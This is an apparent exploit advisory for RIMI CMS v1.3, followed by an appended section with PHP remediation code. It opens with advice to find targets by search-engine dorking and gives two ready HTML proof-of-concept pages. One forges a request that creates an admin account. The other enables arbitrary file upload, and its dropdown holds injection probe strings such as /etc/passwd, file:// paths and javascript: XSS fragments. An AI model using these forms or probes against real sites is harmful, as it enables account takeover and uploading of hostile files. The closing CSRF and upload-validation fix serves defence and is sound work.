=============================================================================================================================================
| # Title : CMS RIMI v1.3 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://github.com/myroot593/RIMICMS |
=============================================================================================================================================

poc :

[+] Dorking in Google or other search engines.
[+] The following HTML code creates a new admin.
[+] Go to line 9.
[+] Set the target site link, save changes and apply.
[+] Save the code as poc.html.

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Profile User Form</title>
</head>
<body>
<form action="http://127.0.0.1/RIMICMS-master/admin/tambah-user.php" method="POST">
<!-- Text input for username -->
<label for="username">Username:</label>
<input type="text" id="username" name="username" required>
<!-- Password input for password -->
<label for="password">Password:</label>
<input type="password" id="password" name="password" required>
<!-- Password input for confirm password -->
<label for="confirm_password">Confirm Password:</label>
<input type="password" id="confirm_password" name="confirm_password" required>
<!-- Text input for name -->
<label for="nama">Nama:</label>
<input type="text" id="nama" name="nama" required>
<!-- Text input for email -->
<label for="email">Email:</label>
<input type="email" id="email" name="email" required>
<!-- Hidden input for user ID -->
<input type="hidden" name="id" value="">
<!-- Submit button -->
<button type="submit">Submit</button>
</form>
</body>
</html>

------------------ [+] Part 2 : arbitrary file upload [+] -------------

[+] Go to line 3.
[+] Set the target site link, save changes and apply.
[+] Your file : 127.0.0.1/cmsrimi/content
[+] Save the code as poc.html.

<p class="sukses-form"></p>
<p class="error-form"></p>
<form action="http://127.0.0.1/RIMICMS-master/admin/tambah-berita.php" method="post" enctype="multipart/form-data">
<div class="form-group ">
<label>Judul :</label>
<input type="text" name="judul_berita" class="form-control" id="judul_berita1" placeholder="Masukan judul berita" value="">
<span><p class="error-form"></p></span>
</div>
<div class="form-group ">
<label>Isi Berita :</label>
<textarea class="ckeditor" name="isi_berita" id="isi_berita"></textarea>
<span><p class="error-form"></p></span>
</div>
<div class="form-group">
<label>Kategori Berita :</label>
<select class='form-control' name='kategori_berita' id='kategori_berita' required=''><option value=1>1</option><option value=a60CyEG6>a60CyEG6</option><option value=0+0+0+1>0+0+0+1</option><option value=basGxKs3>basGxKs3</option><option value=${9999829+9999678}>${9999829+9999678}</option><option value=1&n991278=v96422>1&n991278=v96422</option><option value=)>)</option><option value=/etc/passwd>/etc/passwd</option><option value=!(()&&!|*|*|>!(()&&!|*|*|</option><option value=^(#$!@#$)(()))******>^(#$!@#$)(()))******</option><option value=\'"()>\'"()</option><option value=testasp.vulnweb.com>testasp.vulnweb.com</option><option value=kategori-berita.php>kategori-berita.php</option><option value=file:///etc/passwd>file:///etc/passwd</option><option value=WEB-INF/web.xml?>WEB-INF/web.xml?</option><option value=WEB-INFweb.xml?>WEB-INFweb.xml?</option><option value=1\'">1\'"</option><option value=></option><option value=/WEB-INF/web.xml?>/WEB-INF/web.xml?</option><option value=/www.vulnweb.com>/www.vulnweb.com</option><option value=\'">\'"</option><option value=942313>942313</option><option value=@@5nFvp>@@5nFvp</option><option value=<!--><!--</option><option value=JyI=>JyI=</option><option value=//www.vulnweb.com>//www.vulnweb.com</option><option value=1_927257>1_927257</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1acuON4DgYSPCb>1acuON4DgYSPCb</option><option value=1_924662>1_924662</option><option value=1 src=943436>1 src=943436</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_996088>1_996088</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_984620>1_984620</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option></select>
<p class="error-form"></p>
</div>
<div class="form-group">
<label>Status:</label>
<select class="form-control" name="status_berita" id="status_berita">
<option value="Diterbitkan">Diterbitkan</option>
<option value="Draft">Draft</option>
</select>
</div>
<div class="form-group">
<label>Gambar Berita</label>
<input type="hidden" name="tanggal_berita" id="tanggal_berita" value="24-08-22">
<input type="file" class="form-control-file" id="gambar_berita" name="gambar_berita">
<p class="error-form"></p>
</div>
<button type="submit" class="btn btn-primary">Submit</button>
</form>
<p class="error-form"></p>
<p class="error-form"></p>

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================
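Both proofs of concept work for the same reason: admin/tambah-user.php and admin/tambah-berita.php act on any POST that arrives with the admin's session cookie, with no per-request token and, in the second case, no server-side check of what was uploaded. The following is an added example, not code from RIMI CMS, showing the server-side fix for both parts as helpers the two endpoints would call before doing any work. The function names, the csrf_token field name and the upload directory (assumed to be the content/ directory the Part 2 note points at) are assumptions for this example.

```php
<?php
// Added example, not RIMI CMS code: CSRF token handling (Part 1) and upload
// validation (Part 2) for the admin endpoints named in the advisory.
// Function names, the csrf_token field and the upload path are assumptions.
declare(strict_types=1);

// A Lax SameSite cookie is not sent on cross-site POSTs, which already stops
// the forged forms above in current browsers; the token below is the real
// control. Add 'secure' => true once the panel is served over HTTPS.
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();

// --- Part 1: synchronizer token ---------------------------------------------

// Issue (or reuse) a per-session token when rendering an admin form.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to embed in every POST form the admin panel serves.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// True only for a POST that carries this session's token and comes from this
// host. A page on another origin cannot read the token (same-origin policy)
// and the browser stamps it with its own Origin header.
function csrf_verify(array $post, array $server, string $expectedHost): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    $expected = $_SESSION['csrf_token'] ?? '';
    $given = $post['csrf_token'] ?? '';
    if ($expected === '' || !is_string($given) || !hash_equals($expected, $given)) {
        return false;
    }
    $origin = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    return parse_url($origin, PHP_URL_HOST) === $expectedHost;
}

// --- Part 2: upload validation ----------------------------------------------

// Only the raster types a news image needs, keyed by sniffed MIME type.
const ALLOWED_IMAGE_TYPES = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
const MAX_IMAGE_BYTES = 2 * 1024 * 1024;

// Stores a news image under a server-chosen name, or throws with the reason.
function store_news_image(array $file, string $uploadDir): string
{
    $tmp = $file['tmp_name'] ?? '';
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK || !is_uploaded_file($tmp)) {
        throw new RuntimeException('No valid upload received');
    }
    if (($file['size'] ?? 0) > MAX_IMAGE_BYTES) {
        throw new RuntimeException('File too large');
    }
    // The type comes from the bytes, never from the client's filename or
    // Content-Type, so a script renamed to .jpg is still rejected.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp) ?: 'unknown';
    if (!isset(ALLOWED_IMAGE_TYPES[$mime]) || @getimagesize($tmp) === false) {
        throw new RuntimeException('Not an accepted image: ' . $mime);
    }
    // A random name with an extension derived from the sniffed type discards
    // the original name and any path characters or double extensions in it.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$mime];
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    if (!move_uploaded_file($tmp, $dest)) {
        throw new RuntimeException('Could not store file');
    }
    chmod($dest, 0644);
    return $name;
}

// --- Usage at the top of admin/tambah-berita.php (tambah-user.php uses the
// csrf_verify() call alone) ----------------------------------------------------
if (!csrf_verify($_POST, $_SERVER, $_SERVER['SERVER_NAME'] ?? '')) {
    http_response_code(403);
    exit('Request rejected: bad CSRF token or origin');
}
try {
    $stored = store_news_image($_FILES['gambar_berita'] ?? [], __DIR__ . '/../content');
} catch (RuntimeException $e) {
    http_response_code(400);
    exit('Upload rejected: ' . $e->getMessage());
}
// ... existing news-insertion logic, using $stored as the image filename ...
```

Two caveats a practitioner should keep in mind. csrf_verify() requires an Origin or Referer header, so clients that strip both are refused; if that matters, keep the token check and treat the header check as advisory. And getimagesize() only proves the file starts with a parseable image header, not that nothing follows it, so the upload directory should additionally be served with script execution disabled in the web server configuration.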